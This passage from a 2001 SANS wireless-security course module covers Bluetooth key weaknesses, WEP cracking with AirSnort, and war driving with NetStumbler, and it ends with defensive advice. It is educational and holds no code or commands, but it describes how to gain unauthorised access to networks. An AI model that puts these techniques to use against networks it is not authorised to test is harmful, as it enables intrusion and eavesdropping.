Indeed the special interest group (SIG) driving the Bluetooth standards include several industry
leaders such as 3Com, Agere, Ericsson, IBM, Intel, Lucent, Microsoft, Motorola, Nokia and Toshiba
along with a few thousand other companies. Microsoft has announced that Bluetooth will be
embedded in future versions of Windows and Pocket PCs. Some experts predict that Bluetooth will
eventually displace 802.11 due to its flexibility, but others disagree citing Bluetooth's lesser
bandwidth and range.

Specifications for the Bluetooth protocol standard are available for public download at the link
below, but be prepared to do some reading -- the spec is over 1000 pages long!

A "Bluetooth Primer" is here: http://www.mcommercetimes.com/Technology/37
Find even more information at: http://www.bluetooth.com

                                                6 - 27
                            Bluetooth Security
       • Each Bluetooth device stores the following:
            - 48-bit unique device address
            - 128-bit unique unit key
       • Each connection has a link key associated with it
       • The link key value is chosen during connection
       setup for two devices who have not previously
       communicated (otherwise it can be used for auth)
       • A device's unit key can be used as the link key
       • The link key is used to generate the encryption key
                              Wireless Networking - SANS ©2001                                28

For all of its wonderful flexibility, the Bluetooth protocol has some security issues.
 According to the Bluetooth primer previously referenced, analysts have compared the Bluetooth
security situation to posting a social security number to a chat room. Researchers from Lucent's Bell
Labs discovered that conversations protected by Bluetooth encryption could be easily deciphered. A
researcher from the Helsinki University of Technology performed in-depth research on the topic and
concluded: "Bluetooth is adequate for small applications, but any sensitive data should not be sent
with Bluetooth."
So what's the problem? Basically, all of Bluetooth's security relies on the secrecy of the "link key"
that is chosen when the first connection between two devices is negotiated. The link key is used to
generate the encryption key that protects the data, and can be used for authentication if the two
devices communicate again at a later time. So how is the link key chosen? There are actually several
ways. The simplest and most insecure method is to use one of the device's unit key, and this is often
used in practice, especially with devices that have limited computational and storage capabilities.
The problem arises because the unit key is effectively permanent. If you and I communicate using
my link key, and then I communicate with someone else using my link key, you would be able to
decrypt my communications with the other person.
Additional Bluetooth security problems are discussed on the next page.

The article linked below provides a summary of Bluetooth security issues:

Juha Vainio's paper (research performed at Helsinki University) is here:

                                                6 - 28
                   Bluetooth Security Issues

         • The link key is not really secret, connections can be
         eavesdropped and deciphered
         • The encryption can be broken in some cases
         • A device's address is unique -- by tracking a particular
         address a person's activities can be tracked
         • A 4-digit PIN code must be entered manually each time the
         device is used -- can be a hassle ....
         • To avoid the hassle, PINs can be stored in the device’s
         memory or hard drive => security vulnerability

                             Wireless Networking - SANS ©2001                                   29

This slide highlights some of the other security issues with Bluetooth.
First, according to Vainio, the Bluetooth encryption scheme has some weaknesses and can be broken.
Second, the unique device identifiers can lead to an invasion of privacy. Quoting the
mcommercetimes article linked on the previous page:
"Each Bluetooth device has a unique address, allowing users to have some trust in the person at the
other end of the transmission. However, once this ID is associated with a person, by tracking the
unscrambled address sent with each message, individuals can be traced and their activities easily
Third, Bluetooth devices require that the user enter a four-digit PIN number each time the device is
used. While this sounds like a good idea, there are unfortuately a few issues with the implementation.
It turns out that many people use weak PIN numbers such as "0000". Clearly this is easily guessed,
but worse, Bluetooth uses the PIN to generate "initialization keys" which are used to protect data
when the unit is used for the first time. A weak PIN implies a weak initialization key which implies a
security vulnerability.
Further, a user can easily become frustrated with the need to enter the PIN each time he wants to use
the device. In an ad-hoc network configuaration, the user must enter the PIN for each and every
device he wants to communicate with. Clearly this requirement can quickly become cumbersome.
The solution? Bluetooth devices allow the user to store the PIN in the unit's non-volatile memory or
on its hard drive. This relieves the user of having to enter and re-enter the PIN, but also completely
bypasses the reason for using the PIN in the first place. Any attacker who is able to obtain the device
can impersonate the user to whom the device belongs.

Because most of these problems are inherent in the Bluetooth protocol and implementation, there are
few solutions besides implementing the necessary authentication and encryption mechanisms at the
application layer.

                                               6 - 29

           •   802.11 standard supports 3 physical layers:
                - Infrared
                - Radio Frequency
                    - FHSS-Frequency Hopping Spread Spectrum
                    - DSSS-Direct Sequence Spread Spectrum
           • Branched into 802.11a, 802.11b, and 802.11g
           • 802.11b supports up to 11 Mbps at 2.4 GHz
           • 802.11a supports up to 54 Mbps at 5 GHz
           • 802.11g supports up to 54 Mbps at 2.4 GHz (new)

                             Wireless Networking - SANS ©2001                                  30

The www.extremetech.com website provides a good introduction to 802.11. The information below
is reproduced from a few papers found there. 802.11b is almost always the protocol in use on
wireless LANs.

"IEEE 802.11b is the most common and established wireless network protocol in use today, referred
to as the IEEE 802.11b standard. The 802.11b standard defines, among other things, the radio
frequency bandwidth wireless signals can use, throughput rates over that signal, and how wireless
endpoints communicate with one another.
802.11b signals function in the 2.4000 GHz to 2.4835 GHz range, and have a maximum theoretical
throughput of 11 Mbps (though testing suggests that actual throughput is more like 4-6 Mbps) and
can even step down to 5.5 Mbps, 2 Mbps, and 1 Mbps to allow a more robust signal. 802.11b uses
only Direct Sequence Spread Spectrum (DSSS) radio signaling, as opposed to Frequency Hopping
Spread Spectrum (FHSS), which was part of the original 802.11 specifications. DSSS allows for
greater throughput, but is more suceptible to radio signal interference. Interestingly, many DSSS-
based 802.11 products are inter-operable with current 802.11b networks, but only at 802.11's 2 Mbps
or 1 Mbps. Wireless endpoints have a coverage area that depends on antenna strength and the ability
and clarity of the local environment to transmit radio signals -- typically ranging from 75 to 150 feet
for an office environment."

"Tests of products that use the new 802.11a standard shows that 802.11a networks are as much as
five times faster than 802.11b nets, providing an average throughput of 28 Mbps in practice. The
problem with 802.11a is that it is not interoperable with previously deployed 802.11b products due to
the difference in frequency bands."

                                               6 - 30
                   802.11b Access Control

       • Performed according to MAC (Media Access
       Control) address

       • Performed according to SSID (Service Set
           • The SSID is an identifier attached to all packets
           crossing the wireless LAN
           • The SSID functions as a password for joining the WLAN
           • SSID’s are usually broadcast by Access Points and
           should not be considered "secret"

                           Wireless Networking - SANS ©2001                            31

Typically access control on wireless 802.11b LANs is performed based on MAC address or SSID.
We have already discussed how MAC addresses can be spoofed and how the SSID is often broadcast
by the access point. Thus, neither of these access control mechanisms should be considered

                                           6 - 31
                        802.11b WEP
                   Wired Equivalent Privacy
        •   Encrypts data with 40 or 128 bit keys
        • Automated tools exist to crack WEP encryption
        keys in a matter of hours or days
        • Exploits weakness in RC4 key scheduling algorithm
        • AirSnort needs to gather 100MB - 1GB of data,
        then the key can be computed in less than a second
        • Completely passive attack, difficult to detect

                             Wireless Networking - SANS ©2001                                  32

The 802.11 standard provides for a link layer encryption mechanism called WEP for "Wired
Equivalent Privacy". Unfortunately, this RC4-based encryption mechanism was proven to be
effectively useless during the summer of 2001. Adi Shamir, Itsik Mantin, and Scott Fluhrer presented
a paper at a cryptographers conference which showed a theoretical method for breaking the
encryption. The method is based on exploiting weaknesses in the RC4 Key Scheduling algorithm.
The researchers speculated that the required traffic sample could be passively collected from an
active target wireless network in a few hours.
Soon after, a research team at AT&T implemented the cracking algorithm and proved that the
method works as well in practice as it does in theory. The AT&T team used the method to recover a
128-bit secret key from a production network. Only a $100 Linksys wireless ethernet card, Linux and
sometinkering were needed to enable the capture of raw WEP encrypted packets. After that, the
number crunching required to recover the secret key took only a few hours on a laptop. The exploit
code itself was written in under two hours.
According to the AT&T paper:"Even with the hardware and software problems we ran into, from the
time that we first decided to look at this problem, it took less than a week for the card to be ordered
and shipped, the test-bed to be set up, the problems to be debugged, and a full key to be recovered."
Note that increasing the length of the secret key does not provide any greater security. The Fluhrer
et.al. paper states that the method can be used to recover an arbitrarily long key in a negligible
amount of time that grows only linearly with key size.

News articles:
The AT&T Labs Report: http://www.cs.rice.edu/~astubble/wep/
Fluhrer, Mantin, and Shamir's paper: http://www.crypto.com/papers/others/rc4_ksaproc.ps or

                                               6 - 32
                                  Cracking WEP

      • Several tools are freely available to crack
        WEP encryption automatically
      • AirSnort: http://airsnort.sourceforge.net/
      • WEPCrack:
      • Completely passive attack
      • Typically only takes a few hours to recover
        encryption keys from a busy network
                              Wireless Networking - SANS ©2001                                 33

The first exploit tools to automatically recover encryption keys from WEP-protected 802.11 wireless
networks have already been released. These tools work by exploiting the recently publicized
weaknesses in the RC4 Key Scheduling algorithm. One tool, called AirSnort, passively monitors
network traffic and computes the WEP encryption key once enough packets have been gathered.
Reports indicate that AirSnort typically needs between 100 Mb and 1 Gb of data to work with, but
given that, the encryption key can be calculated in under a second. The tool is written in C/C++ and
runs on Linux.

From the AirSnort FAQ:
To crack a WEP password, AirSnort needs a certain number of packets with weak keys. Out of the
sixteen million keys which can be generated by WEP cards, about three thousand are weak (for 128
bit encryption.) Call these packets with weak keys "interesting." Most passwords can be guessed with
after about two thousand interesting packets.
All 802.11b networks with 40/128 bit WEP encryption are vulnerable. As this is a passive attack,
nothing can be done to detect to detect that this is being done, either.

The AirSnort development page at SourceForge can be found here.

A similar tool, called WEPCrack, is also under development.

These are the first publicly available implementations of the attacks theorized by Fluhrer, Mantin,
and Shamir.

                                               6 - 33
                             802.11b Security
       • SSID’s are often broadcast by Access Points or given out
       upon receiving an anonymous request
       • SSID’s can be easily sniffed
       • Any machine that has the correct SSID can join the network
       • WEP encryption easily cracked, tools are available to
       automate the passive recovery of WEP encryption keys
       • MAC addresses can be sniffed; the MACs are sent in clear
       text even with WEP enabled
       • MAC addresses can be spoofed

                             Wireless Networking - SANS ©2001                                  34

This slide basically recaps what we have discussed several times in this module:
         • SSIDs are not secure. They are often broadcast by access points in beacon signals. Access
         points will also give out the SSID to anyone who asks unless configured not to do so. Thus,
         you should expect that anyone can discover your network's SSID.
         • WEP encryption raises the bar for attackers wishing to eavesdrop, but not by much. As
         discussed on the previous page, automated tools exist to crack WEP encryption keys in a
         matter of hours.
         • MAC address-based authentication is nice, but not sufficient for access control. Many
         devices allow their MACs to be changed, and thus MAC spoofing is entirely possible.

In general, it is a good idea to use MAC authentication, WEP encryption, and a hard-to-guess SSID
while configuring your access point to keep quiet. However, these methods have all been shown to
be insufficient for securing a network. The protections may deter casual, opportunistic attackers, but
will not present significant obstacles to a determined adversary.

                                               6 - 34
                     How To Protect 802.11
           • Use a strong authentication mechanism
           • Require mutual authentication between
           client and server
           • Utilize end-to-end encrypytion at the
           higher protocol layers (e.g. SSH and SSL)
           • Configure the AP to keep silent about
           the SSID
                            Wireless Networking - SANS ©2001                               35

Reiterating our 802.11 security requirements:
• Use a strong authentication mechanism. This means something based on cryptographic keys, and
does not mean using a username and password that will traverse the WLAN in clear text.
• Require mutual authentication between client and server. This protects against the two
masquerading attacks previously discussed.
• Utilize end-to-end encryption at the higher protocol layers. This means using a VPN-type
solution instead of relying on 802.11's link layer WEP encryption.
• Configure the AP to keep silent about the SSID. This amounts to disabling the AP's beacon
signal and configuring it to ignore anonymous requests for the SSID. Unfortunately not all AP
products will allow the user to configure the system this way.

                                                6 - 35
                             Wireless Attacks

           • Wireless technology is getting much cheaper
           • Base stations for less than $200, with
             wireless cards under $100
               - IEEE 802.11b standard very popular
               - Employees setting up their own access points so
                 they can roam around the halls
               - Very dangerous!
           • War driving
               - With a laptop and wireless card, an attacker can
                 drive down the street and join many wireless
                            Wireless Networking - SANS ©2001                               36

This slide simply highlights how easy it is for an attacker to wreak havoc on an unsuspecting
wireless LAN. Soon we will see an example of a program called NetStumbler that will bring this
point home.

                                             6 - 36
                 Wireless Misconfigurations

           • Many wireless access points (aka base
             stations) are configured with no security
           • In some installations, SSID used as a
             password is the only security
                - Blank or default SSIDs are common
           • Access points often broadcast the SSID
           • Access points often respond to
             anonymous requests for the SSID
                             Wireless Networking - SANS ©2001                                  37

Due to the misconfiguration issues given in the slide (and previously discussed), many WLAN
administrators enable a new attacker technique known as "war driving".
In war driving, an attacker armed with a laptop, RF receiver and antenna, simply drives around town
looking for open wireless networks. Many networks will announce their presence via the beacon
signals, in other cases the attacker sends out broadcast "pings" that elicit response from the APs
within range.

The eye-opening article linked below details a "war-driving" excursion made by two BBC journalists
and two "white-hat hackers" in London's financial district. Armed with a laptop sporting a wireless
network card and a GPS handset, the entourage found that two-thirds of the networks they
discovered were completely unprotected. Further, the networks that did attempt to protect their data
did so using only known-crackable wireless encryption technologies.
Any malicious party could easily join these networks and have the same level of access enjoyed by
an internal user. This is a frightening prospect when we realize that London's financial district is
largely populated by investment banks, financial advisors, and regional offices of large corporations.


                                               6 - 37
                       Tools For War Driving

           • Perl Script by Peter Shipley
                - Ties in geography (using GPS) with SSID and signal strength
                - http://lists.bawug.org/pipermail/wireless/2001-
           • Francisco Luis Roque’s Scripts
                - No GPS
                - http://www.blackant.net/other/wireless.php
           • Airopeek
                - Commercial
                - Sniffs data
                - http://www.wildpackets.com/products/airopeek

                            Wireless Networking - SANS ©2001                                 38

Many tools are available to aid the would-be war-driver. Our favorite is NetStumbler, described next.

                                              6 - 38
            • http://www.netstumbler.org
            • Runs on Win2000/98/95

                              Wireless Networking - SANS ©2001                                   39

Netstumbler sends out a broadcast probe about once a second, and reports the responses. The
responses are typically generated by infrastructure access points, who generously supply the name of
their networks as well as their SSIDs. Ad-hoc network clients also sometimes respond. In the ad-hoc
case, NetStumbler attempts to find the names of all locally visible peers.
From the screen shot above, generated in New York City, we see that many many wireless LANs
have been discovered, along with their names and SSIDs. It would be trivial for an attacker to
connect to most of these networks and masquerade as a legitimate endpoint. That is, the attacker
would have "internal" access to the other computers connected to the wireless LAN. With "internal
access" the attacker would be free to poke at open shares on Windows machines, sniff passwords,
 Netstumbler is freely available from the URL on the slide. Security auditors and attackers alike find
it easy to use. Download it, load it up, and try it out. The results you generate just by driving around
your neighborhood will frighten and amaze you.

                                                6 - 39
                   Course Revision History

                           Wireless Networking - SANS ©2001    40

v1.0 – E. Cole – June 2001
v1.1 – edited/formatted by J. Kolde – 8 June 2001
v1.2 – edited by E. Cole – July 2001
V1.3 – edited and audio recorded by C. Wendt – July 13, 2001
v1.3a – edited by J. Kolde – 23 July 2001
V1.4 – edits by E. Cole – 10 Aug 2001
V1.5 – updated by E. Cole – 1 Nov 2001
V 1.6 – updated by V. Irwin - 21 Jan 2002
v1.6a –edited by C. Wendt 25 Jan 2002

                                            6 - 40

To top